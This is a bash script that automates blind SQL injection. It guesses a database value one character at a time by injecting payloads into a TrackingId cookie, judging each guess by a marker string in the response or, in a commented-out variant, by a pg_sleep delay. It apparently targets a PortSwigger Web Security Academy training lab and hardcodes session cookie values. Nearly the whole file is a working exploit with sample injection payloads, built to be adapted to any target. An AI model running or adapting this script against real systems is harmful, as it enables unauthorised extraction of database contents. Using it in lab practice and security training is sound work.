🎊🎊🎊🎊
#!/bin/bash
# blind_sql.sh
# Created on: Sun 17 Oct 2021 02:35:42 AM BST
#
# ____ __ ____ __
# ( _ \ /. |( _ \/ )
# )___/(_ _))___/ )(
# (__) (_)(__) (__)
#
# Description:
# This tool tests for and exploits blind SQL injection: each request asks
# whether one guessed character is correct, and we decide from a difference
# in the response (content, error or delay) whether the guess matched. Areas a
# user must adapt to the target (endpoint, cookies, payload, oracle string) are
# marked with an [EDIT] tag.
# Note:
# $query -> stands for the query
# $j -> stands for the position of the character in the string
# $i -> is the character currently being tested
# Payloads:
# https://portswigger.net/web-security/sql-injection/cheat-sheet
# - ' AND substring(($query),$j,1)='$i
# - ' AND (SELECT CASE WHEN (SUBSTR(($query),$j,1)='$i') THEN to_char(1/0) ELSE 'a' END FROM dual)='a
# - '%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM $db_name--
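set -eu

# Candidate characters, tried in this order for every position.
# {A..z} is deliberately NOT used: in bash it also expands to [ \ ] ^ _ `,
# and a bare backslash inside the SQL string literal breaks the query on
# MySQL-style escaping, turning a real match into a false negative.
# NOTE(review): ';' and ',' are kept for parity with the original charset, but
# both are cookie delimiters and will presumably be mangled before reaching
# the SQL layer — confirm against the target before trusting a hit on them.
charset=( {0..9} {A..Z} {a..z} . : , \; - _ @ )
URL="https://0ade00b10430eecf807cf9fe00590036.web-security-academy.net" # [EDIT] change with correct endpoint
truestring="Giant Pillow Thing" # [EDIT] change with the string on true statements
maxlength=30                    # [EDIT] maximum number of characters to extract
query="SELECT @@version"        # [EDIT] change with the query needed
# [EDIT] cookies carried by every request. The session value is a credential:
# prefer exporting SESSION / TRACKING_ID in the environment to editing the file
# (and keep in mind that argv of a running curl is visible in `ps`).
session="${SESSION:-CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D}"
tracking_id="${TRACKING_ID:-v7aOHBncsO6lUJym}"
result=""

#######################################
# Boolean oracle: one request per guess.
# Arguments: $1 - 1-based character position, $2 - candidate character
# Returns:   0 when the response contains $truestring (guess is correct),
#            1 otherwise. Aborts the script on a transport failure so a
#            network error is never mistaken for "no character matched".
# [EDIT] adapt the payload and the curl call to the target; see the payload
# section in the header of this file for samples.
#######################################
oracle() {
  local pos=$1 guess=$2 body
  local payload="${tracking_id}' AND substring((${query}),${pos},1)='${guess}"
  # The injection point is the TrackingId cookie, so the values are sent as
  # cookies (the time-based sample below does the same via a Cookie header).
  body=$(curl -s --max-time 15 "$URL" -b "session=${session}; TrackingId=${payload}") || {
    printf '\nrequest failed (curl exit %d) at position %d\n' "$?" "$pos" >&2
    exit 1
  }
  # -F: the marker is a literal string, not a regex; -q: status only.
  grep -qF -- "$truestring" <<<"$body"
}

# Time-based variant: uncomment and use in place of oracle() when true and
# false responses look identical. A guess is correct when the server stalls
# for at least 10 seconds (pg_sleep(10) in the payload).
#oracle() {
#  local pos=$1 guess=$2 start
#  local payload="${tracking_id}'%3b SELECT CASE WHEN (substring((${query}),${pos},1)='${guess}') THEN pg_sleep(10) ELSE pg_sleep(0) END--"
#  start=$SECONDS
#  curl -s -o /dev/null --max-time 30 "$URL" -H "Cookie: TrackingId=${payload}" || return 1
#  (( SECONDS - start >= 10 ))
#}

printf 'Found: '
# pos <= maxlength: the original used '<', which silently dropped the last
# character of a value exactly maxlength long.
for (( pos = 1; pos <= maxlength; pos++ )); do
  matched=0
  for guess in "${charset[@]}"; do
    printf '%s' "$guess"        # show the candidate while it is being tested
    if oracle "$pos" "$guess"; then
      result+="$guess"
      matched=1
      break
    fi
    printf '\b \b'              # erase the rejected candidate
  done
  # Nothing matched at this position: end of the value, or a character
  # outside $charset — either way there is no point probing further.
  (( matched )) || break
done
printf '\n'
if (( ${#result} == maxlength )); then
  printf 'note: hit maxlength=%d; the value may be longer, raise maxlength\n' "$maxlength" >&2
fi
exit 0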